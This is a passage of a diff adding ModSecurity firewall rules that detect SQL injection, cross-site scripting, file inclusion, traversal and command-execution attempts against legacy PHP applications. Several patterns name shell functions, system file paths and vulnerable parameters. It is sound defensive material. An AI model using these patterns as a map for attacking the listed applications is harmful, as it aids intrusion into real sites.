+SecRule REQUEST_URI "index\.php" "phase:2,id:310445,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Squirrelcart index.php SQL injection attempt',chain,t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
+SecRule ARGS:crn "(?:delete|insert|drop|do|alter|replace|truncate|update|create|rename|describe)[[:space:]]+(?:from|into|table|database|index|view)"
+
+
+# Rule 310466: eGroupWare index.php cats_app Variable SQL Injection
+SecRule REQUEST_URI "/index\.php\?menuaction=preferences\.uicategories\.index\&cats_app=*(?:delete|insert|drop|do|alter|replace|truncate|update|create|rename|describe|select|union)[[:space:]]+[a-z|0-9|\*| ]+[[:space:]](?:from|into|table|database|index|view|select)" "phase:2,t:none,t:urlDecodeUni,t:replaceNulls,t:replaceComments,t:compressWhiteSpace,t:lowercase,id:310466,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: eGroupWare index.php SQL injection attempt'"
+
+
+# Rule 310467: eGroupWare tts/index.php filter Variable SQL Injection
+SecRule REQUEST_URI "/tts/index\.php\?filter=*(?:delete|insert|drop|do|alter|replace|truncate|update|create|rename|describe|select|union)[[:space:]]+[a-z|0-9|\*| ]+[[:space:]](?:from|into|table|database|index|view|select)" "phase:2,t:none,t:urlDecodeUni,t:replaceNulls,t:replaceComments,t:compressWhiteSpace,t:lowercase,id:310467,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: eGroupWare tts/index.php SQL injection attempt'"
+
+SecMarker END_INDEX_PHP_JITP
+
+##############index.php rules################################
+#
+
+#53
+#FreePHPBlogSoftware "phpincdir" File Inclusion Vulnerability
+SecRule REQUEST_URI "default_theme\.php" "phase:2,chain,t:none,t:urlDecodeUni,t:lowercase,t:replaceNulls,t:compressWhiteSpace,id:390652,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - FreePHPBlogSoftware phpincdir File Inclusion Vulnerability'"
+SecRule ARGS:phpincdir "(?:^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/|\.\./|/(?:etc|proc|sys|tmp|var|home))"
+
+#OSSEC 404 stuff does this better
+SecRule REQUEST_URI  "thisdoesnotexistahaha\.php" "phase:2,id:350023,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Non-Existant File Google Recon attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
+
+
+# Rule 380005: phpBB Remote Code Execution Attempt
+SecRule REQUEST_URI "viewtopic\.php\?" "phase:2,id:380005,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: PHP session cookie attack',chain,t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
+SecRule ARGS:highlight "(\'|\%[a-f0-9]{4})(\.|\/|\\|\%[a-f0-9]{4}).+?(\'|\%[a-f0-9]{4})"
+
+
+# Rule 310008:  squirrel mail spell-check arbitrary command attempt
+SecRule REQUEST_URI "/squirrelspell/modules/check_me\.mod\.php" "phase:2,id:310008,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: squirrel mail spell-check arbitrary command attempt',chain,t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
+SecRule REQUEST_URI "sqspell_app\["
+
+
+# Rule 310009:  squirrel mail theme arbitrary command attempt
+SecRule REQUEST_URI "/left_main\.php" "phase:2,id:310009,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: squirrel mail theme arbitrary command attempt',chain,t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
+SecRule REQUEST_URI "cmdd="
+
+
+# Rule 310010:  directory.php arbitrary command attempt
+SecRule REQUEST_URI "/directory\.php\?" "phase:2,id:310010,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: directory.php arbitrary command attempt',chain,t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
+SecRule REQUEST_URI "\;"
+
+
+# Rule 310045:  DNSTools administrator authentication bypass attempt
+SecRule REQUEST_URI "/dnstools\.php" "phase:2,id:310045,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: DNSTools administrator authentication bypass attempt',chain,t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
+SecRule REQUEST_URI "(?:user_dnstools_administrator|user_logged_in)=true"
+
+
+# Rule 310049:  Blahz-DNS dostuff.php modify user attempt
+SecRule REQUEST_URI "/dostuff\.php\?action=modify_user" "phase:2,id:310049,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Blahz-DNS dostuff.php modify user attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
+
+
+# Rule 310050:  PHP-Wiki cross site scripting attempt
+SecRule REQUEST_URI "/modules\.php\?*name=wiki*\<*(script|about|applet|activex|chrome)*\>" "phase:2,id:310050,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: PHP-Wiki cross site scripting attemptt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
+
+
+# Rule 310053:  shoutbox.php directory traversal attempt
+SecRule REQUEST_URI "/shoutbox\.php" "phase:2,id:310053,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: shoutbox.php directory traversal attempt',chain,t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
+SecRule REQUEST_URI "\.\./"
+
+
+
+
+
+# Rule 310057:  autohtml.php directory traversal attempt
+SecRule REQUEST_URI "/autohtml\.php" "phase:2,id:310057,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: autohtml.php directory traversal attempt',chain,t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
+SecRule REQUEST_URI "\.\./\.\./"
+
+
+
+
+# Rule 310061:rolis guestbook remote file include attempt
+SecRule REQUEST_URI "/insert\.inc\.php*path=" "phase:2,id:310061,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: guestbook remote file include attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
+
+
+
+# Rule 310064:  DCP-Portal remote file include attempt
+SecRule REQUEST_URI "/library/lib\.php" "phase:2,id:310064,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: DCP-Portal remote file include attempt',chain,t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
+SecRule REQUEST_URI "root="
+
+
+
+# Rule 310067:  Invision Board emailer.php file include
+SecRule REQUEST_URI "/ad_member\.php" "id:310067,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Invision Board emailer.php file include',chain,t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
+SecRule REQUEST_URI "emailer\.php"
+
+
+# Rule 310068:  WebChat db_mysql.php file include
+SecRule REQUEST_URI "/defines\.php" "id:310068,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: WebChat db_mysql.php file include',chain,t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
+SecRule REQUEST_URI "db_mysql\.php"
+
+
+# Rule 310069:  WebChat english.php file include
+SecRule REQUEST_URI "/defines\.php" "id:310069,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: WebChat english.php file include',chain,t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
+SecRule REQUEST_URI "english\.php"
+
+
+# Rule 310070:  Typo3 translations.php file include
+SecRule REQUEST_URI "/translations\.php" "id:310070,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Typo3 translations.php file include',chain,t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
+SecRule REQUEST_URI "only=\x2e"
+
+
+# Rule 310072:  YaBB SE packages.php file include
+SecRule REQUEST_URI "/packages\.php" "id:310072,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: YaBB SE packages.php file include',chain,t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
+SecRule REQUEST_URI "packer\.php"
+
+
+# Rule 310073:  newsPHP Language file include attempt
+SecRule REQUEST_URI "/nphpd\.php" "id:310073,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: newsPHP Language file include attempt',chain,t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
+SecRule REQUEST_URI "langFile"
+
+
+# Rule 310075:Invision Board ipchat.php file include
+SecRule REQUEST_URI "/ipchat\.php*root_path*conf_global\.php" "id:310075,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Invision Board ipchat.php file include',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
+
+
+
+# Rule 310077:  PhpGedView PGV functions.php base directory manipulation
+#	attempt
+SecRule REQUEST_URI "(?:functions|_conf|config_gedcom|authentication_index)\.php" "id:310077,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: PhpGedView PGV functions.php base directory manipulation attempt',chain,t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
+SecRule REQUEST_URI "pgv_base_directory"
+
+
+# Rule 310078:  TUTOS path disclosure attempt
+SecRule REQUEST_URI "/note_overview\.php" "id:310078,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: TUTOS path disclosure attempt',chain,t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
+SecRule REQUEST_URI "id="
+
+
+# Rule 310083:Calendar XSS
+SecRule REQUEST_URI "/(?:calendar|setup).php" "chain,id:310083,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Calendar XSS',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
+SecRule ARGS:phpc_root_path "(?:^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/|(?:<|script|about|applet|activex|chrome))"
+
+
+# Rule 310084:phpMyAdmin Export.PHP File Disclosure Vulnerability
+SecRule REQUEST_URI "export\.php" "id:310084,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: phpMyAdmin Export.PHP File Disclosure Vulnerability',chain,t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
+SecRule ARGS:what "\.\."
+
+
+# Rule 310086:More PHPBB worms
+SecRule REQUEST_URI "/viewtopic\.php\?" "id:310086,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: PHPBB worm',chain,t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
+SecRule ARGS "(?:chr|fwrite|fopen|system|echr|passthru|popen|proc_open|shell_exec|exec|proc_nice|proc_terminate|proc_get_status|proc_close|pfsockopen|leak|apache_child_terminate|posix_kill|posix_mkfifo|posix_setpgid|posix_setsid|posix_setuid|phpinfo)\(?:(?:[0-9a-fa-fx]{1,3})\)"
+
+
+
+# Rule 310211:  Phorum /support/common.php access
+SecRule REQUEST_URI  "/support/common\.php" "id:310211,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch:  Phorum common.php direct access attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
+
+
+# Rule 310212:  rolis guestbook remote file include attempt
+SecRule REQUEST_URI  "/insert\.inc\.php" "id:310212,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch:  Rolis guestbook insert.inc.php remote file inclusion attempt',chain,t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
+SecRule REQUEST_URI "path="
+
+
+
+
+# Rule 310217:  Invision Board ipchat.php file include
+SecRule REQUEST_URI  "/ipchat\.php" "id:310217,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: : Invision Board ipchat.php file inclusion attempt',chain,t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
+SecRule REQUEST_URI "conf_global\.php"
+
+
+# Rule 310219:  YaBB SE packages.php file include
+SecRule REQUEST_URI  "/packages\.php" "id:310219,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: : YaBB SE packages.php file inclusion attempt',chain,t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
+SecRule REQUEST_URI "packer\.php"
+
+
+
+# Rule 310224:  WAnewsletter newsletter.php file inclusion attempt
+SecRule REQUEST_URI  "newsletter\.php" "id:310224,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: : WAnewsletter newsletter.php file inclusion attempt',chain,t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
+SecRule REQUEST_URI "start\.php"
+
+
+# Rule 310225:  Opt-X header.php remote file include attempt
+SecRule REQUEST_URI  "/header\.php" "id:310225,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: : Opt-X header.php remote file inclusion attempt',chain,t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
+SecRule REQUEST_URI "systempath="
+
+
+
+# Rule 310228: Dforum executable code injection attempt
+SecRule REQUEST_URI  "/dforum/nav\.php" "chain,id:310228,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Dforum nav.php3 executable code injection attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
+SecRule ARGS:page "<[[:space:]]*(?:script|about|applet|activex|chrome)"
+
+
+# Rule 310229: phpMyAdmin path vln
+SecRule REQUEST_URI "/css/phpmyadmin\.css\.php" "chain,id:310229,rev:3,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: phpMyAdmin phpmyadmin.css.php file inclusion attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
+SecRule ARGS:globals[cfg][themepath] "(?:/|\.\./)"
+
+
+# Rule 310231: PHPBB full path disclosure
+SecRule REQUEST_URI "(?:forums?|phpbb)/db/oracle\.php" "id:310231,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: PHPBB oracle.php full path disclosure attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
+
+
+# Rule 310239: phpbb
+SecRule REQUEST_URI "admin/admin_styles\.php\?mode=addnew\&install_to=\.\./\.\./" "id:310239,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: phpBB admin_styles.php directory traversal attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
+
+
+
+# Rule 310241: phpAdsNew path disclosure
+SecRule REQUEST_URI "/libraries/lib-xmlrpcs.inc\.php" "id:310241,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: phpAdsNew lib-xmlrpcs.inc.php path disclosure attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
+
+
+# Rule 310242: phpAdsNew path disclosure
+SecRule REQUEST_URI "/maintenance/maintenance-activation\.php" "id:310242,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: phpAdsNew maintenance-activation.php path disclosure attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
+
+
+# Rule 310243: phpAdsNew path disclosure
+SecRule REQUEST_URI "/maintenance/maintenance-cleantables\.php" "id:310243,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: phpAdsNew maintenance-cleantables.php path disclosure attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
+
+
+# Rule 310244: phpAdsNew path disclosure
+SecRule REQUEST_URI "/maintenance/maintenance-autotargeting\.php" "id:310244,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: phpAdsNew maintenance-autotargeting.php path disclosure attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
+
+
+# Rule 310245: phpAdsNew path disclosure
+SecRule REQUEST_URI "/maintenance/maintenance-reports\.php"         "id:310245,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: phpAdsNew maintenance-reports.php path disclosure attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
+
+
+# Rule 310246: phpAdsNew path disclosure
+SecRule REQUEST_URI "/misc/backwards\x20compatibility/phpads\.php"         "id:310246,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: phpAdsNew backwards compatibility phpads.php path disclosure attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
+
+
+# Rule 310247: phpAdsNew path disclosure
+SecRule REQUEST_URI "/misc/backwards\x20compatibility/remotehtmlview\.php"         "id:310247,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: phpAdsNew backwards compatibility remotehtmlview.php path disclosure attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
+
+
+# Rule 310248: phpAdsNew path disclosure
+SecRule REQUEST_URI "/misc/backwards\x20compatibility/click\.php"         "id:310248,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: phpAdsNew backwards compatibility click.php path disclosure attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
+
+
+# Rule 310253: citrusdb
+SecRule REQUEST_URI "/citrusdb/tools/uploadcc\.php"         "id:310253,rev:1,severity:1,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: citrusdb tools/uploadcc.php credit card data upload attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
+
+
+# Rule 310262: phpbb XSS
+SecRule REQUEST_FILENAME "/posting\.php"         "chain,id:310262,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: phpBB posting.php cross-site-scripting attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
+SecRule ARGS:phpbb2mysql_t "(?:\<(?:script|javascript|about|applet|activex|chrome)|^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/)" 
+
+# Rule 310263: phpbb XSS
+SecRule REQUEST_URI "/posting\.php"         "chain,id:310263,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: phpBB posting.php cross-site-scripting attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
+SecRule REQUEST_URI "(?:\<(?:javascript|script|about|applet|activex|chrome)|^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/)" 
+
+# Rule 310264: phpbb XSS
+SecRule REQUEST_URI|REQUEST_BODY "/privmsg\.php"         "id:310264,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: phpBB privmsg.php cross-site-scripting attempt',chain,t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
+SecRule REQUEST_URI|REQUEST_BODY "\<a href=*(?:script|about|applet|activex|chrome)"
+
+
+# Rule 310266: Unique stuff caught in our traps
+SecRule REQUEST_URI  "/mail_autocheck\.php\?pm_path=(?:\<(?:javascript|script|about|applet|activex|chrome)*\>|^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/)"         "id:310266,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: mail_autocheck.php cross-site-scripting attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
+
+
+# Rule 310269: Multiple Vulnerabilities in ProjectBB
+SecRule REQUEST_URI  "/divers\.php\?action=liste\&liste=\&desc=\&pages=(?:\<(?:javascript|script|about|applet|activex|chrome)*\>|^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/)"         "id:310269,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: ProjectBB divers.php cross-site-scripting attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
+
+
+# Rule 310270: Multiple Vulnerabilities in ProjectBB
+SecRule REQUEST_URI "/divers\.php\?action=liste\&liste=(?:\<(?:javascript|script|about|applet|activex|chrome)*\>|^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/)"         "id:310270,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: ProjectBB divers.php cross-site-scripting attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
+
+
+# Rule 310271: Multiple Vulnerabilities in ProjectBB
+SecRule REQUEST_FILENAME "/zip/divers\.php"         "chain,id:310271,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: ProjectBB Zip/divers.php SQL injection attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:replaceComments,t:compressWhiteSpace,t:lowercase"
+Secrule ARGS:desc "'"
+
+
+# Rule 310272: WebChat english.php or db_mysql.php file include
+SecRule REQUEST_FILENAME "/defines\.php"        "chain,id:310272,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: WebChat defines.php local file inclusion attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
+SecRule REQUEST_URI "(?:db_mysql\.php|english\.php)"
+
+
+# Rule 310273: Cross-Site Scripting Vulnerability in D-Forum
+SecRule REQUEST_URI "/nav\.php3\?page=(?:\<(?:javascript|script|about|applet|activex|chrome)*\>|^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/)"         "id:310273,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: D-Forum nav.php3 cross-site-scripting attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
+
+
+# Rule 310275: Multiple Vulnerabilities in auraCMS
+SecRule REQUEST_URI "/hits\.php\?hits=(?:\<(?:javascript|script|about|applet|activex|chrome)*\>|^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/)"         "id:310275,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: auraCMA hits.php cross-site-scripting attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
+
+
+# Rule 310276: Multiple Vulnerabilities in auraCMS
+SecRule REQUEST_URI "/counter\.php\?theCount=(?:\<(?:javascript|script|about|applet|activex|chrome)*\>|^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/)"         "id:310276,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: auraCMA counter.php cross-site-scripting attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
+
+
+# Rule 310277: vBulletin Remote Command Execution Attempt
+SecRule REQUEST_URI "/forumdisplay\.php?[^\r\n]*comma=[^\r\n\x26]*system\x28"         "id:310277,rev:1,severity:1,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: vBulletin forumdisplay.php local command execution attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
+
+
+# Rule 310278: vBulletin Remote Command Execution Attempt
+SecRule REQUEST_URI "/forumdisplay\.php\?"         "id:310278,rev:1,severity:1,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: vBulletin forumdisplay.php local command execution attempt',chain,t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
+SecRule REQUEST_URI|REQUEST_BODY "\.system\(.+\)\."
+
+
+# Rule 310279: vBulletin Remote Command Execution Attempt
+SecRule REQUEST_URI "/forumdisplay\.php\?*comma="         "id:310279,rev:1,severity:1,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: vBulletin forumdisplay.php local command execution attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
+
+
+# Rule 310280:  PHPNuke general XSS attempt
+#/modules.php?name=News&file=article&sid=1&optionbox=
+SecRule REQUEST_URI "/modules\.php\?*name=*\<*(?:script|about|applet|activex|chrome)*\>"         "id:310280,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: PHPnuke modules.php cross-site-scripting attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
+
+
+# Rule 310281:  PHPNuke general XSS attempt
+SecRule REQUEST_URI "/modules\.php\?op=modload&name=News&file=article&sid=*\<*(?:script|about|applet|activex|chrome)*\>"         "id:310281,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: PHPnuke modules.php cross-site-scripting attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
+
+
+# Rule 310282:  PHPNuke SQL injection attempt
+SecRule REQUEST_URI  "/modules\.php\?*name=search*instory="         "t:none,t:urlDecodeUni,t:replaceNulls,t:replaceComments,t:compressWhiteSpace,t:lowercase,id:310282,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: PHPnuke modules.php SQL injection attempt'"
+
+
+# Rule 310283:  PHPNuke SQL injection attempt
+SecRule REQUEST_FILENAME  "/modules.php "         "chain,t:none,t:urlDecodeUni,t:lowercase,id:310283,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: PHPnuke modules.php SQL injection attempt'"
+SecRule ARGS:name "(?:search|web_links)" "chain,t:none,t:urlDecodeUni,t:replaceNulls,t:replaceComments,t:compressWhiteSpace,t:lowercase"
+SecRule ARGS "'" "t:none,t:urlDecodeUni,t:replaceNulls,t:replaceComments,t:compressWhiteSpace,t:lowercase"
+
+
+# Rule 310284:  EasyDynamicPages exploit
+SecRule REQUEST_URI "!(^/livehelp/admin_users_refresh\.php)"         "chain,id:310284,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: EasyDynamicPages edp_relative_path exploitation attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
+SecRule REQUEST_URI "edp_relative_path=" 
+
+# Rule 310286:  phpnuke sql insertion
+#SecRule REQUEST_URI "/modules\.php*name=forums.*file=viewtopic*/forum=.*\'/" #        "t:none,t:urlDecodeUni,t:replaceNulls,t:replaceComments,t:compressWhiteSpace,t:lowercase,id:310286,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: PHPnuke modules.php SQL injection attempt'"
+
+
+# Rule 310287:  WAnewsletter newsletter.php file include attempt
+SecRule REQUEST_URI "newsletter\.php*waroot*start\.php"         "id:310287,rev:1,severity:1,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: WAnewsletter newsletter.php local file inclusion attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
+
+
+# Rule 310288:   Typo3 translations.php file include
+SecRule REQUEST_URI "/translations\.php*only"         "id:310288,rev:1,severity:1,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Typo3 translations.php local file inclusion attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
+
+
+
+# Rule 310307: RUNCMS,Exoops,CIAMOS highlight file access hole
+SecRule REQUEST_URI "/class/debug/highlight\.php\?file=(?:/|\.\./)"         "id:310307,rev:1,severity:1,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: RUNCMS.Exoops.CIAMOS highlight.php file access attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
+
+
+# Rule 310308: TRG/CzarNews News Script Include File Hole Lets Remote users
+# 	Execute Arbitrary Commands
+SecRule REQUEST_URI "/install/(?:article|authorall|comment|display|displayall.)\.php\?dir=(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/"         "id:310308,rev:1,severity:1,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: TRG/CzarNews /install/* local command execution attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
+
+
+# Rule 310309: zpanel XSS
+#SecRule REQUEST_FILENAME "/zpanel.php" #        "chain,id:310309,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: zPanel zpanel.php cross-site-scripting or SQLi attempt'"
+#SecRule ARGS:page "(?:(?:javascript|script|about|applet|activex|chrome)*\>|^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/|')" 
+
+# Rule 310311: Phorum http Response Splitting Vulnerability
+#SecRule REQUEST_URI "/search\.php\?forum_id=.*\&search=.*\&body=.*Content-Length\:.*HTTP/1\.0.*Content-Type\:.*Content-Length\:" #        "id:310311,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Phorum search.php http response splitting attempt'"
+
+
+# Rule 310313: PhotoPost Pro
